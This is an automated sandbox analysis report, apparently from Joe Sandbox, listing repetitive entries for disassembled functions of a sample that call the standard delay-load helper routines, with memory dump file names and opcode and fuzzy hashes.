                                                                                                  Function 0091E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 3fbabdeef0a4b14b326d556a4070f40329d6eb7484210a101095bfbec0d83e5b
                                                                                                  • Instruction ID: e3cb72f101b5b5fa7ea4631dbe8088ca1c4ddeaa9e36519521ed70670acd2d36
                                                                                                  • Opcode Fuzzy Hash: 3fbabdeef0a4b14b326d556a4070f40329d6eb7484210a101095bfbec0d83e5b
                                                                                                  • Instruction Fuzzy Hash: 0DB012D175D144BC310451151C06DB7015DD6C2B10730C43EFC06C0080D840AC811931
                                                                                                  Function 0091E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 048c7abe314040d57f8dde6485a0657f817ae900b0b2029fe163361ae867bc96
                                                                                                  • Instruction ID: e1039a7ec163dcbb344ff69431039e1f82444ecac9bfe501e9eee3fa31b14c4e
                                                                                                  • Opcode Fuzzy Hash: 048c7abe314040d57f8dde6485a0657f817ae900b0b2029fe163361ae867bc96
                                                                                                  • Instruction Fuzzy Hash: 5CB012D136D144BC310451151C06DB7019DEAC1B10730843EFC07C0080D8406C811931
                                                                                                  Function 0091E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 383eaffa8bfc8c306577138e0d1590d0a5a43a95f22415250ece2d767980b406
                                                                                                  • Instruction ID: f53865ed98d03108831e6ade1c5fc5c07d99be9e3eff79122733b7f3eb86efe6
                                                                                                  • Opcode Fuzzy Hash: 383eaffa8bfc8c306577138e0d1590d0a5a43a95f22415250ece2d767980b406
                                                                                                  • Instruction Fuzzy Hash: 52B012D175C104BC310451261C06DB7019CD4C2B14330C43EFC06C0080D840ECC12931
                                                                                                  Function 0091E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: a2fde1dade9e8d1246642e6f988433cf6710cfb6ed7e9d5d431a18bde03897b1
                                                                                                  • Instruction ID: 268d77b5b21250d7536f2b17b6d8e261d8a072015cc9fed949ce44186551ae9a
                                                                                                  • Opcode Fuzzy Hash: a2fde1dade9e8d1246642e6f988433cf6710cfb6ed7e9d5d431a18bde03897b1
                                                                                                  • Instruction Fuzzy Hash: 9DB012E135C1157C310455041E03DB7025CC4C0B24330C42EFD14D1480D8400C8F0933
                                                                                                  Function 0091E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 7f787345b4ed75c9e3abc3ae467ef11183a19556dd5533e93d984b0ae8f88c95
                                                                                                  • Instruction ID: f7d53ae0b9c9dbf35bbd68b8871df5260e8e7ea32236c487af6a15dd55953f40
                                                                                                  • Opcode Fuzzy Hash: 7f787345b4ed75c9e3abc3ae467ef11183a19556dd5533e93d984b0ae8f88c95
                                                                                                  • Instruction Fuzzy Hash: 93B012F135C115FC310491041C03D77025CC4C0F14330C42EFC14D1081D8444E8A0933
                                                                                                  Function 0091E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 2a48cb54ea2766835a568b33095c8762f344630ef221573b1525393da38b1083
                                                                                                  • Instruction ID: f17361648e0addb6e4c05372fbdc9100ebf925f7956ef168d2793890e83b82cd
                                                                                                  • Opcode Fuzzy Hash: 2a48cb54ea2766835a568b33095c8762f344630ef221573b1525393da38b1083
                                                                                                  • Instruction Fuzzy Hash: 23B012E135C115BC310495041D03D77025CC4C0B24330C42EFC14D1480D8404C8A0933
                                                                                                  Function 0091E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 22a95a687433ac4a39de92300cb71cc68d50c453b9a9053e416d87192ae182d8
                                                                                                  • Instruction ID: 39f220e69f4edab7fd46c53cb1ac37455752d3aa0127adb2758659707d431553
                                                                                                  • Opcode Fuzzy Hash: 22a95a687433ac4a39de92300cb71cc68d50c453b9a9053e416d87192ae182d8
                                                                                                  • Instruction Fuzzy Hash: 8CB012C175D2097D310451541C03D77019DC4C1B1C331852EFC04D1080E8500C810935
                                                                                                  Function 0091E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: e38ba3ed2a7989f5f8da1213548694ec6588ba90305e7fd98ffe40ca173a2672
                                                                                                  • Instruction ID: 49b23498c6240a71be44842318eedf8188b74f7329791d9d165ea132347a851c
                                                                                                  • Opcode Fuzzy Hash: e38ba3ed2a7989f5f8da1213548694ec6588ba90305e7fd98ffe40ca173a2672
                                                                                                  • Instruction Fuzzy Hash: D2B012C175C3057D314451545C03D7701BDC4C1B1C331862EFC04D1080E8400CC10935
                                                                                                  Function 0091E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 12871f0352d874ccba20d40ccc402bc454117ad82e495ed930cbecbdfdd30059
                                                                                                  • Instruction ID: 73b93e3698b3553fc7b02122e78a524a6818e365c43752742d839f72cbf2b918
                                                                                                  • Opcode Fuzzy Hash: 12871f0352d874ccba20d40ccc402bc454117ad82e495ed930cbecbdfdd30059
                                                                                                  • Instruction Fuzzy Hash: B4B012C175C2057C310451545D03D7741BDC4C1B1C371862EFC04D1080EC400D820935
                                                                                                  Function 0091E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: e22f47f7042ea2484cbc9e296d7d87c1318a6d52441229bdd67b354612e04016
                                                                                                  • Instruction ID: 97e53b81f3fa8278587992bee9530340b786054d4ed5adfc8dabcdd696f77a4b
                                                                                                  • Opcode Fuzzy Hash: e22f47f7042ea2484cbc9e296d7d87c1318a6d52441229bdd67b354612e04016
                                                                                                  • Instruction Fuzzy Hash: 38B012C135C5057C310412241C07D7B011DC4C1F18730943EFC11D04C1A8400D890931
                                                                                                  Function 0091E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 34df6a04c801084c0b2ccf57d3249bce9ee91424b588a203be45dd55402783a6
                                                                                                  • Instruction ID: 4c5721306b2f26504e7d1cb737de1ec2ebe012b16bf68f373781e56baa600c5d
                                                                                                  • Opcode Fuzzy Hash: 34df6a04c801084c0b2ccf57d3249bce9ee91424b588a203be45dd55402783a6
                                                                                                  • Instruction Fuzzy Hash: 57B012C135E5057D350452081C03E7B015DC4C1F18330852EFC05C0080E8500C850A31
                                                                                                  Function 0091E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 00a141cabe078e4ed5cddbd22970a085d3c9f373941807d55bba775212a404da
                                                                                                  • Instruction ID: 59f0f57303cead9c820328f842cd9e381cb73f94738be60f1e6d5ebd1dec60e4
                                                                                                  • Opcode Fuzzy Hash: 00a141cabe078e4ed5cddbd22970a085d3c9f373941807d55bba775212a404da
                                                                                                  • Instruction Fuzzy Hash: 49B012C13595457C350452081D03D7B055DC4C1F18330C52EFC05C0080E8500C860A31
                                                                                                  Function 0091E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 4542904104e88c6f91b7f9cdae29398db75b94aba50e1fed53d5441aba69d924
                                                                                                  • Instruction ID: fd6bc3c5526e650a0acfffece7c4574fc4481e19b1f2a0b59450cf35b8304604
                                                                                                  • Opcode Fuzzy Hash: 4542904104e88c6f91b7f9cdae29398db75b94aba50e1fed53d5441aba69d924
                                                                                                  • Instruction Fuzzy Hash: 2BB012C13586057C320452085C03D7B016DC4C1F18330862EFC05C0080E8400CC90A31
                                                                                                  Function 0091E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: ce97c7123928960182b799a19b6684a386271e7d31a9fd7c6758a1b8a523114e
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: ce97c7123928960182b799a19b6684a386271e7d31a9fd7c6758a1b8a523114e
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
